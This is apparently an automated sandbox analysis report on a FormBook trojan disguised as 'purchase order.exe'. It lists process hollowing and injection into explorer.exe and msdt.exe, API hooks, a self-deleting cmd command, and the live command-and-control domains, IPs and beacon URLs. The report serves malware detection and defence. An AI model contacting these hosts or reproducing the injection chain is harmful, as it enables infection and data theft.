            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485AA16 mov eax, dword ptr fs:[00000030h]5_2_0485AA16
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485AA16 mov eax, dword ptr fs:[00000030h]5_2_0485AA16
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04855210 mov eax, dword ptr fs:[00000030h]5_2_04855210
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04855210 mov ecx, dword ptr fs:[00000030h]5_2_04855210
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04855210 mov eax, dword ptr fs:[00000030h]5_2_04855210
            Source: C:\Users\user\Desktop\purchase order.exe; Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\msdt.exe; Process token adjusted: Debug
            Source: C:\Users\user\Desktop\purchase order.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exe; Network Connect: 154.3.112.106 80
            Source: C:\Windows\explorer.exe; Network Connect: 192.252.210.84 80
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\purchase order.exe; Memory written: C:\Users\user\Desktop\purchase order.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\purchase order.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\purchase order.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\purchase order.exe; Thread register set: target process: 3440
            Source: C:\Windows\SysWOW64\msdt.exe; Thread register set: target process: 3440
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\purchase order.exe; Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\purchase order.exe; Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: F60000
            Source: C:\Users\user\Desktop\purchase order.exe; Process created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe
            Source: C:\Windows\SysWOW64\msdt.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'
            Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp; Binary or memory string: Progman
            Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp; Binary or memory string: &Program Manager
            Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\purchase order.exe; Queries volume information: C:\Users\user\Desktop\purchase order.exe VolumeInformation
            Source: C:\Users\user\Desktop\purchase order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\purchase order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\purchase order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\purchase order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\purchase order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\purchase order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\purchase order.exe; Code function: 0_2_06A2A4C0 GetUserNameA
            Source: C:\Users\user\Desktop\purchase order.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook

            Remote Access Functionality:

            Yara detected FormBook

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 331 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Virtualization/Sandbox Evasion 14 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 14 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | System Information Discovery 112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 2 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Behavior graph. ID: 323034; Sample: purchase order.exe; Startdate: 26/11/2020; Architecture: WINDOWS; Score: 100. Process chain: purchase order.exe (started) → purchase order.exe (started) → explorer.exe (injected) → msdt.exe (started) → cmd.exe (started) → conhost.exe (started).]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            purchase order.exe | 29% | Virustotal |
            purchase order.exe | 19% | ReversingLabs | Win32.Trojan.Wacatac
            purchase order.exe | 100% | Joe Sandbox ML |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            2.2.purchase order.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            No Antivirus matches

            URLs


            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            rettexo.com | 34.102.136.180 | true | true | | unknown
            makgxoimisitzer.info | 192.252.210.84 | true | true | | unknown
            www.keystonefulfillment.com | 52.58.78.16 | true | false | | unknown
            purehempbotanicalsinfo.com | 154.3.112.106 | true | true | | unknown
            www.makgxoimisitzer.info | unknown | unknown | true | | unknown
            www.rettexo.com | unknown | unknown | true | | unknown
            g.msn.com | unknown | unknown | false | | high
            www.purehempbotanicalsinfo.com | unknown | unknown | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://www.purehempbotanicalsinfo.com/sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp | true | Avira URL Cloud: safe | unknown
            http://www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp | true | Avira URL Cloud: safe | unknown
            http://www.makgxoimisitzer.info/sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp | true | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepurchase order.exe, 00000000.00000002.355213949.0000000002CD1000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.sakkal.comexplorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown

                                                    Contacted IPs

                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
154.3.112.106 | unknown | United States | 54133 | UNMETEREDCA | true
192.252.210.84 | unknown | United States | 46562 | TOTAL-SERVER-SOLUTIONSUS | true

                                                    General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323034
Start date: 26.11.2020
Start time: 08:33:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 50s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: purchase order.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@6/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 10.9% (good quality ratio 9.6%)
• Quality average: 70.1%
• Quality standard deviation: 32.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 124
• Number of non-executed functions: 134
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 104.43.193.48, 51.11.168.160, 2.20.142.209, 2.20.142.210, 51.103.5.159, 52.155.217.156, 20.54.26.129, 52.142.114.176, 92.122.213.247, 92.122.213.194, 23.210.248.85, 51.104.144.132
                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
08:34:57 | API Interceptor | 1x Sleep call for process: purchase order.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs


                                                    Domains

                                                    No context

                                                    ASN


                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order.exe.log
Process: C:\Users\user\Desktop\purchase order.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1406
Entropy (8bit): 5.341099307467139
Encrypted: false
SSDEEP: 24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHg
MD5: BA56316A0540A6E8A0773ABCC4C34831
SHA1: 4684785CBF231C1F6F3A9FE948419F71B17219FB
SHA-256: 5B713DB1DFB5B7CE60DD4CD7B98F092C362370D857EE944248F9FDC4E5C9C496
SHA-512: B0FE5F565DFEF658A108F5BFA43F477EC2FF6583E7C9B8BB34A1B9710A840EA713BE9C38DF90C540D64B64F28CD6D22E812518875858B0049FA5379B67DB9577
Malicious: true
Reputation: moderate, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                    Static File Info

                                                    General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.22732835315573
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: purchase order.exe
File size: 908288
MD5: 975187a07455d3cbf38ec878d893b490
SHA1: af8ddbf775cdb9dbd3776f717c192094202127be
SHA256: 009d9a0f6fafa91b750271413fef5771a4ce5855a59c0e6c16c85eb7de08e52b
SHA512: 378768e3aa1a49e6dce7a83197c1eceb86111422a6886fbe9e3ba7df75ce2bdb0f0979620a8eb905153caf276b43a23dd19885ff487586b3069a515cceb15222
SSDEEP: 12288:3WXLGRqJGxSYzVK435Ve6H2IZyqr6jNhjjYk65zPvELO07CuevjcA57x4vqqpPT4:3yLG80zVK435Ve+ZZyn3jjc5LvELx
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|2._..............P.................. ........@.. .......................@............@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

Entrypoint: 0x4dee8e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5FBF327C [Thu Nov 26 04:43:40 2020 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    Name                                  Virtual Address  Virtual Size  Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT          0xdee34          0x57          .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe0000          0x610         .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe2000          0xc           .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                    Sections

                                                    Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                    .text   0x2000           0xdce94       0xdd000   False     0.670616736779   data       7.23319521913   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc   0xe0000          0x610         0x800     False     0.33203125       data       3.44771191569   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc  0xe2000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    Name         RVA      Size   Type  Language  Country
                                                    RT_VERSION   0xe00a0  0x380  data
                                                    RT_MANIFEST  0xe0420  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLL          Import
                                                    mscoree.dll  _CorExeMain

                                                    Version Infos

                                                    Description       Data
                                                    Translation       0x0000 0x04b0
                                                    LegalCopyright    Copyright Hewlett-Packard 2017
                                                    Assembly Version  1.0.0.0
                                                    InternalName      L6HC.exe
                                                    FileVersion       1.0.0.0
                                                    CompanyName       Hewlett-Packard
                                                    LegalTrademarks
                                                    Comments
                                                    ProductName       Arizona Lottery Numbers
                                                    ProductVersion    1.0.0.0
                                                    FileDescription   Arizona Lottery Numbers
                                                    OriginalFilename  L6HC.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP       Dest IP
                                                    11/26/20-08:35:59.647235  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49750      34.102.136.180  192.168.2.6

                                                    TCP Packets


                                                    UDP Packets


                                                    DNS Queries

                                                    Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                            Type            Class
                                                    Nov 26, 2020 08:35:51.457932949 CET  192.168.2.6  8.8.8.8  0x76aa    Standard query (0)  g.msn.com                       A (IP address)  IN (0x0001)
                                                    Nov 26, 2020 08:35:59.462236881 CET  192.168.2.6  8.8.8.8  0x23ef    Standard query (0)  www.rettexo.com                 A (IP address)  IN (0x0001)
                                                    Nov 26, 2020 08:36:19.859580994 CET  192.168.2.6  8.8.8.8  0x6c33    Standard query (0)  www.makgxoimisitzer.info        A (IP address)  IN (0x0001)
                                                    Nov 26, 2020 08:36:26.727475882 CET  192.168.2.6  8.8.8.8  0x13d5    Standard query (0)  g.msn.com                       A (IP address)  IN (0x0001)
                                                    Nov 26, 2020 08:36:42.501482010 CET  192.168.2.6  8.8.8.8  0x5c12    Standard query (0)  www.purehempbotanicalsinfo.com  A (IP address)  IN (0x0001)
                                                    Nov 26, 2020 08:37:03.285170078 CET  192.168.2.6  8.8.8.8  0xe22c    Standard query (0)  www.keystonefulfillment.com     A (IP address)  IN (0x0001)

                                                    DNS Answers

                                                    Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                            CName                               Address         Type                    Class
                                                    Nov 26, 2020 08:35:51.503340960 CET  8.8.8.8    192.168.2.6  0x76aa    No error (0)  g.msn.com                       g-msn-com-nsatc.trafficmanager.net                  CNAME (Canonical name)  IN (0x0001)
                                                    Nov 26, 2020 08:35:59.508137941 CET  8.8.8.8    192.168.2.6  0x23ef    No error (0)  www.rettexo.com                 rettexo.com                                         CNAME (Canonical name)  IN (0x0001)
                                                    Nov 26, 2020 08:35:59.508137941 CET  8.8.8.8    192.168.2.6  0x23ef    No error (0)  rettexo.com                                                         34.102.136.180  A (IP address)          IN (0x0001)
                                                    Nov 26, 2020 08:36:19.926716089 CET  8.8.8.8    192.168.2.6  0x6c33    No error (0)  www.makgxoimisitzer.info        makgxoimisitzer.info                                CNAME (Canonical name)  IN (0x0001)
                                                    Nov 26, 2020 08:36:19.926716089 CET  8.8.8.8    192.168.2.6  0x6c33    No error (0)  makgxoimisitzer.info                                                192.252.210.84  A (IP address)          IN (0x0001)
                                                    Nov 26, 2020 08:36:26.763277054 CET  8.8.8.8    192.168.2.6  0x13d5    No error (0)  g.msn.com                       g-msn-com-nsatc.trafficmanager.net                  CNAME (Canonical name)  IN (0x0001)
                                                    Nov 26, 2020 08:36:42.727859020 CET  8.8.8.8    192.168.2.6  0x5c12    No error (0)  www.purehempbotanicalsinfo.com  purehempbotanicalsinfo.com                          CNAME (Canonical name)  IN (0x0001)
                                                    Nov 26, 2020 08:36:42.727859020 CET  8.8.8.8    192.168.2.6  0x5c12    No error (0)  purehempbotanicalsinfo.com                                          154.3.112.106   A (IP address)          IN (0x0001)
                                                    Nov 26, 2020 08:36:42.727859020 CET  8.8.8.8    192.168.2.6  0x5c12    No error (0)  purehempbotanicalsinfo.com                                          154.3.112.107   A (IP address)          IN (0x0001)
                                                    Nov 26, 2020 08:37:03.326234102 CET  8.8.8.8    192.168.2.6  0xe22c    No error (0)  www.keystonefulfillment.com                                         52.58.78.16     A (IP address)          IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.rettexo.com
                                                    • www.makgxoimisitzer.info
                                                    • www.purehempbotanicalsinfo.com

                                                    HTTP Packets

                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                    0           192.168.2.6  49750        34.102.136.180  80                C:\Windows\explorer.exe
                                                    Timestamp                            kBytes transferred  Direction  Data
                                                    Nov 26, 2020 08:35:59.532458067 CET  4462                OUT        GET /sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp HTTP/1.1
                                                    Host: www.rettexo.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 26, 2020 08:35:59.647234917 CET  4463                IN         HTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Thu, 26 Nov 2020 07:35:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5fb7c9ca-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                    1           192.168.2.6  49754        192.252.210.84  80                C:\Windows\explorer.exe
                                                    Timestamp                            kBytes transferred  Direction  Data
                                                    Nov 26, 2020 08:36:20.049163103 CET  4473                OUT        GET /sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp HTTP/1.1
                                                    Host: www.makgxoimisitzer.info
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Timestamp: Nov 26, 2020 08:36:20.176032066 CET, kBytes transferred: 4474, Direction: IN, Data:
                                                    HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Content-Length: 706
                                                    Date: Thu, 26 Nov 2020 07:36:20 GMT
                                                    Server: LiteSpeed
                                                    Location: https://www.makgxoimisitzer.info/sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session ID: 2, Source IP: 192.168.2.6, Source Port: 49759, Destination IP: 154.3.112.106, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                    Timestamp: Nov 26, 2020 08:36:42.935230017 CET, kBytes transferred: 4532, Direction: OUT, Data:
                                                    GET /sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp HTTP/1.1
                                                    Host: www.purehempbotanicalsinfo.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Timestamp: Nov 26, 2020 08:36:43.141685009 CET, kBytes transferred: 4533, Direction: IN, Data:
                                                    HTTP/1.1 200 OK
                                                    Date: Thu, 26 Nov 2020 15:36:43 GMT
                                                    Server: Apache
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Status: 304
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

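                                                    • Function Name: PeekMessageA, Hook Type: INLINE, Active in Processes: explorer.exe
                                                    • Function Name: PeekMessageW, Hook Type: INLINE, Active in Processes: explorer.exe
                                                    • Function Name: GetMessageW, Hook Type: INLINE, Active in Processes: explorer.exe
                                                    • Function Name: GetMessageA, Hook Type: INLINE, Active in Processes: explorer.exe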

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
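                                                    • Function Name: PeekMessageA, Hook Type: INLINE, New Data: 0x48 0x8B 0xB8 0x87 0x7E 0xEE
                                                    • Function Name: PeekMessageW, Hook Type: INLINE, New Data: 0x48 0x8B 0xB8 0x8F 0xFE 0xEE
                                                    • Function Name: GetMessageW, Hook Type: INLINE, New Data: 0x48 0x8B 0xB8 0x8F 0xFE 0xEE
                                                    • Function Name: GetMessageA, Hook Type: INLINE, New Data: 0x48 0x8B 0xB8 0x87 0x7E 0xEE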

                                                    Statistics

